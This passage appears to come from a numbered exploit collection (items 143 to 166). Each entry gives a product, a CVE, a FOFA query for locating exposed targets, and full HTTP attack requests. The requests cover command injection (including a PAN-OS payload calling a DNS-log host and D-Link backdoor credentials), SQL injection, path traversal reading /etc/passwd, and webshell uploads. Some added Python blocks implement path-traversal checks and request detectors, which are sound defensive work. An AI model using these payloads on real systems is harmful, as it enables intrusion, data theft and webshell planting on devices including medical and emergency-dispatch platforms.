admin/admin

143. Netis WF2780 v2.1.40144: remote command execution
CVE-2024-25850
FOFA: title='AP setup' && header='netis'
PAYLOAD

144. D-Link NAS: command injection via nas_sharing.cgi
CVE-2024-3273 (command injection) chained with CVE-2024-3272 (the hard-coded mydlinkBRionyg account); neither identifier is on the original page. The affected DNS models are end-of-life and D-Link's guidance is to retire them.
FOFA: app="D_Link-DNS-ShareCenter"
The system parameter carries the command to run, base64-encoded: aWQ= is id. passwd=YWJjMTIzNDVjYmE is the base64 of abc12345cba, the backdoor account's password.
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA: icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}<dnslog-host>`;
Accept-Encoding: gzip

The SESSID value is used as a file name, so the traversal drops an empty file whose name contains the backticked command under the device-telemetry directory; the command runs later when the telemetry job processes that directory. The HTTP response shows nothing, and the DNS callback is the only indicator.

146. MajorDoMo thumb.php: unauthenticated remote code execution
CNVD-2024-02175
FOFA: app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

url is the base64 of rtsp://a and transport decodes to || (echo '[S]'; id; echo '[E]')#; so with debug=1 the output of id appears between [S] and [E] in the response.

147. RaidenMAILD mail server v4.9.4: path traversal
CVE-2024-32399
FOFA: body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

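Items 126, 129 and 147 are the same defect seen from three products: a client-supplied path joined onto a directory without first checking where it lands. As an added example that is not code from the original page or from any of the three projects, here is a Python resolver that does the checks in the right order (decode, reject absolute paths and NUL bytes, collapse dot segments lexically, and only then consult the filesystem), and a demo() that builds a throwaway web root with a symlink pointing outside it and feeds it the exact payload shapes from those three items. The follow_symlinks flag mirrors the aiohttp option from item 126; with it on, a symlink inside the root is allowed to point anywhere, which is the deliberate semantics of that option and the reason it should be reserved for roots you fully control.

```python
import posixpath
import shutil
import tempfile
from pathlib import Path
from urllib.parse import unquote


def resolve_under_root(root, request_path, follow_symlinks=False):
    """Map a client-supplied relative path to a file under root, or return None.

    Order matters: percent-decode once, refuse NUL bytes and absolute paths,
    collapse '.'/'..' lexically and refuse anything that climbs above the root,
    and only then touch the filesystem. With follow_symlinks=False the resolved
    (symlink-free) location must still lie inside root; with True, symlinks may
    point anywhere (the aiohttp option from item 126).
    """
    root = Path(root).resolve()
    decoded = unquote(request_path)
    if "\x00" in decoded or decoded.startswith("/"):
        return None
    normalized = posixpath.normpath(decoded)
    if normalized == ".." or normalized.startswith("../"):
        return None  # '..' survived normalization: the path escapes the root
    candidate = root / normalized
    if not follow_symlinks:
        try:
            candidate.resolve().relative_to(root)
        except ValueError:
            return None  # a symlink under root points outside it
    return candidate


def demo():
    """Build a temporary web root (one real file, one symlink pointing outside)
    and run the traversal shapes from items 126, 129 and 147 plus an encoded
    variant. Returns {case: path relative to root, or None when refused}."""
    base = Path(tempfile.mkdtemp())
    try:
        outside = base / "secret.txt"
        outside.write_text("outside the web root\n")
        root = base / "static"
        root.mkdir()
        (root / "index.html").write_text("<h1>ok</h1>\n")
        (root / "link").symlink_to(outside)
        cases = {
            "index": ("index.html", False),
            "aiohttp_126": ("../../../../../etc/passwd", False),
            "coldfusion_129": ("../../../../../../../etc/passwd", False),
            "raidenmaild_147": ("../../../windows/win.ini", False),
            "encoded": ("%2e%2e/%2e%2e/etc/passwd", False),
            "symlink_strict": ("link", False),
            "symlink_follow": ("link", True),
        }
        results = {}
        for case, (path, follow) in cases.items():
            hit = resolve_under_root(root, path, follow_symlinks=follow)
            results[case] = None if hit is None else hit.relative_to(root.resolve()).as_posix()
        return results
    finally:
        shutil.rmtree(base)
```

The lexical check alone is not enough (it cannot see symlinks) and the filesystem check alone is not enough either (a resolve() on a path that does not exist yet says nothing about intent), which is why both run, in that order.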
148. CrushFTP: unauthenticated server-side template injection (VFS sandbox escape)
CVE-2024-4040
FOFA: body="CrushFTP"
PAYLOAD
Fixed in CrushFTP 10.7.1 and 11.1.0 (fix versions not on the original page).

149. AJ-Report open-source dashboard: remote command execution
FOFA: title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

validationRules is evaluated as JavaScript by the JVM's script engine, which exposes java.lang.ProcessBuilder; this payload runs ipconfig (a Windows target), the one in item 150 runs id.

150. AJ-Report 1.4.0: authentication bypass and remote code execution
FOFA: title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

Same endpoint and mechanism as item 149. The ;swagger-ui/ matrix segment is what lets the request through unauthenticated: the authentication filter sees a Swagger UI resource in the raw URI, while the dispatcher strips the matrix parameter and routes to /dataSetParam/verification.

151. AJ-Report 1.4.1: pageList SQL injection
FOFA: title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

The published request only demonstrates that dataSource/pageList is reachable without authentication through the ;swagger-ui/ prefix; the injectable parameter is not given on the page.

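Items 132, 149, 150 and 151 all exploit the gap between the string an authentication filter inspects and the path the container actually routes: a ";" segment (a matrix parameter, or a ";.jsp" suffix on a forwarded path) is stripped by the dispatcher but not by a naive check. The block below is an added example, not code from the original page, TeamCity or AJ-Report: it normalises a request target the way a Servlet/Spring router does, shows the vulnerable substring-style allowlist check next to one that decides on the routed path, and runs both over constructed access-log lines carrying the targets from those four items. PUBLIC_PREFIXES is an assumed allowlist for illustration, not either product's real configuration.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed allowlist an auth filter lets through without a session.
PUBLIC_PREFIXES = ("/swagger-ui", "/v2/api-docs", "/login")

LOG_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def routed_path(raw_path):
    """The path a Servlet/Spring dispatcher matches on: percent-decoded, with
    ';name=value' matrix parameters dropped from every segment, empty segments
    removed and '.'/'..' collapsed."""
    segments = [seg.split(";", 1)[0] for seg in unquote(raw_path).split("/")]
    return posixpath.normpath("/" + "/".join(seg for seg in segments if seg))


def naive_allows(raw_path):
    """The vulnerable pattern: a substring match on the raw request URI."""
    return any(prefix.lstrip("/") in raw_path for prefix in PUBLIC_PREFIXES)


def hardened_allows(raw_path):
    """Decide on the same path the dispatcher will route, anchored to a segment."""
    path = routed_path(raw_path)
    return any(path == p or path.startswith(p + "/") for p in PUBLIC_PREFIXES)


def analyze(target):
    """Return (routed_path, bypass) for one request target. bypass is True when
    the raw-string check and the routed path disagree, or when a forwarded path
    smuggled in the jsp parameter carries a ';' suffix (the TeamCity shape)."""
    parts = urlsplit(target)
    routed = routed_path(parts.path)
    bypass = naive_allows(parts.path) and not hardened_allows(parts.path)
    for value in parse_qs(parts.query).get("jsp", []):
        if ";" in value:
            routed, bypass = routed_path(value), True
    return routed, bypass


def scan(log_lines):
    """Run analyze() over access-log lines; returns [(target, routed, bypass)]."""
    out = []
    for line in log_lines:
        match = LOG_LINE.search(line)
        if match:
            target = match.group(1)
            routed, bypass = analyze(target)
            out.append((target, routed, bypass))
    return out


# Constructed access-log lines carrying the targets from items 132, 149/150 and
# 151, plus one legitimate Swagger UI request that must not be flagged.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Mar/2024:10:00:01 +0000] "POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1" 200 311',
    '10.0.0.5 - - [01/Mar/2024:10:00:02 +0000] "POST /dataSetParam/verification;swagger-ui/ HTTP/1.1" 200 94',
    '10.0.0.5 - - [01/Mar/2024:10:00:03 +0000] "GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1" 200 2048',
    '10.0.0.9 - - [01/Mar/2024:10:00:04 +0000] "GET /swagger-ui/index.html HTTP/1.1" 200 1024',
]
```

For hunting, the cheap rule is simply "a ';' anywhere in the path or in a forwarded-path parameter"; the routed_path() output tells you which protected endpoint the request actually reached.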
152. Progress Kemp LoadMaster: remote command execution
CVE-2024-1212
Affected:
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA: body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 of ';ls;':doesnotmatter. The user-name half of the Basic credential reaches a shell unescaped, so the quoted ;ls; runs before any password is checked.
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip
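Items 122, 144 and 152 hide the real payload behind one layer of base64 (a SQL statement in a query parameter, a shell command in the system parameter, shell metacharacters in a Basic-auth user name), which is enough to slip past signature matching on the raw request. The following is an added example, not code from the original page or from any of the three vendors: it opportunistically decodes base64-looking query values and Basic credentials, keeps only results that are printable text, and reports which of them contain SQL or shell syntax. SUSPICIOUS_NAMES is an assumed list of parameter names that should never carry an encoded blob at all.

```python
import base64
import binascii
import re
from urllib.parse import parse_qsl, urlsplit

B64_ALPHABET = re.compile(r"[A-Za-z0-9+/=_ -]+")
SHELL_META = re.compile(r"[;|&`]|\$\(")
SQL_WORDS = re.compile(r"\b(?:select|union|sleep|database|version|updatexml|extractvalue)\b", re.I)
# Assumed: parameter names that, on their own, should never carry an encoded blob.
SUSPICIOUS_NAMES = {"sql", "system", "cmd", "exec", "command"}


def try_b64(value):
    """Decode value if it is a base64 blob of printable text, else None.
    Tolerates missing padding and the URL-safe alphabet; a '+' that a form
    decoder turned into a space is restored first."""
    s = value.strip()
    if not s or not B64_ALPHABET.fullmatch(s):
        return None
    s = s.replace(" ", "+").replace("-", "+").replace("_", "/")
    s += "=" * (-len(s) % 4)
    try:
        text = base64.b64decode(s, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    if not text or not all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return None  # short plain words often decode to binary garbage; drop those
    return text


def classify(text):
    """Tuple of syntax families found in decoded text."""
    kinds = []
    if SQL_WORDS.search(text):
        kinds.append("sql")
    if SHELL_META.search(text):
        kinds.append("shell")
    return tuple(kinds)


def inspect_request(target, headers=None):
    """Decode base64-looking query values and the Basic-auth user name of one
    request; returns [(where, decoded_text, kinds)] for everything that decoded."""
    headers = headers or {}
    findings = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = try_b64(value)
        if decoded is None:
            continue
        kinds = classify(decoded)
        if name.lower() in SUSPICIOUS_NAMES:
            kinds += ("encoded-" + name.lower(),)
        findings.append((name, decoded, kinds))
    auth = headers.get("Authorization", "")
    if auth.lower().startswith("basic "):
        decoded = try_b64(auth[6:])
        if decoded is not None:
            user = decoded.split(":", 1)[0]
            findings.append(("Authorization.user", user, classify(user)))
    return findings
```

The printable-text filter is what keeps the false-positive rate usable: ordinary values like user=mydlinkBRionyg or type=exportexcelbysql are valid base64 alphabets but decode to bytes that are not text, and are dropped.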

153. Gradio arbitrary file read
CVE-2024-1561
FOFA: body="__gradio_mode__"
Step 1: request /config and take a component id from the components list
http://x.x.x.x/config

Step 2: have the server copy /etc/passwd into a temporary file under its cache directory
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: fetch the cached copy (the hashed directory name is returned by step 2)
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianwell (天维尔) fire-rescue operations dispatch platform: SQL injection
CVE-2024-3720
FOFA: body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

Time-based blind against PostgreSQL (PG_SLEEP): the injection point is the gsdwid field of the JSON query object.
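Items 131, 134, 135, 137 to 141 and 154 are all SQL injection, but they arrive in four different containers: a URL-encoded query string, a form field, a JSON body, and a JSON string nested inside another JSON value inside a form field (item 134). A detector that only looks at the raw line misses most of them. The block below is an added example, not code from the original page or from any of the vendors: it unwraps every layer (form decoding, JSON, JSON-in-string) down to plain strings and then classifies them by technique. The request samples are constructed here from the payload strings published in those items.

```python
import json
import re
from urllib.parse import parse_qsl, urlsplit

TIME_BASED = re.compile(r"\b(?:SLEEP|PG_SLEEP|BENCHMARK)\s*\(|\bWAITFOR\s+DELAY\b", re.I)
ERROR_BASED = re.compile(r"\b(?:UPDATEXML|EXTRACTVALUE)\s*\(", re.I)
UNION_BASED = re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)


def strings_in(value):
    """Yield every string reachable inside a decoded value. Strings that are
    themselves JSON (the NS-ASG messagecontent array holds a JSON string) are
    parsed and descended into, so nesting depth does not hide a payload."""
    if isinstance(value, str):
        yield value
        if value[:1] in "{[":
            try:
                yield from strings_in(json.loads(value))
            except ValueError:
                pass
    elif isinstance(value, dict):
        for item in value.values():
            yield from strings_in(item)
    elif isinstance(value, list):
        for item in value:
            yield from strings_in(item)


def classify(text):
    """Set of injection techniques whose signature appears in text."""
    kinds = set()
    if TIME_BASED.search(text):
        kinds.add("time-based")
    if ERROR_BASED.search(text):
        kinds.add("error-based")
    if UNION_BASED.search(text):
        kinds.add("union-based")
    return kinds


def inspect(target, body="", content_type=""):
    """Union of techniques seen in the query string and body of one request;
    the body is treated as JSON or as form-encoded depending on content_type."""
    texts = []
    for _, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        texts.extend(strings_in(value))
    if body:
        if "json" in content_type:
            try:
                texts.extend(strings_in(json.loads(body)))
            except ValueError:
                texts.append(body)
        else:
            for _, value in parse_qsl(body, keep_blank_values=True):
                texts.extend(strings_in(value))
    found = set()
    for text in texts:
        found |= classify(text)
    return found


# Constructed requests carrying the exact payload strings from items 131, 134,
# 135, 137, 141 and 154, plus a benign AJ-Report paging request.
SAMPLES = {
    "mini_tmall_131": ("/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)", "", ""),
    "ns_asg_134": ("/protocol/index.php", r"""jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}""", "application/x-www-form-urlencoded"),
    "ns_asg_135": ("/admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e))", "", ""),
    "kirisun_137": ("/api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF", "", ""),
    "kirisun_141": ("/app/ext/ajax_users.php", "dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -", "application/x-www-form-urlencoded"),
    "tianwell_154": ("/twms-service-mfs/mfsNotice/page", """{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}""", "application/json"),
    "benign": ("/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10", "", ""),
}


def scan():
    """Classify every sample; returns {name: sorted list of techniques}."""
    return {name: sorted(inspect(*req)) for name, req in SAMPLES.items()}
```

The signatures are deliberately narrow (function calls that have no business in a parameter value) rather than generic keyword lists, so the benign paging request classifies as empty; broaden them only with a corpus of your own traffic to measure against.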

155. LyLme Spage (六零导航页): arbitrary file upload via file.php
CVE-2024-34982
FOFA: title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

The response echoes the stored file name, e.g. http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) Medical Image Archiving and Communication System WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>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</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 Fully Intelligent Parking Fee System Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field specifies the file name and the <fileFlow> field specifies the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰 Multimedia Information Publishing System QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 Distribution Management System ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) Management System FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 Ticketing Management Platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
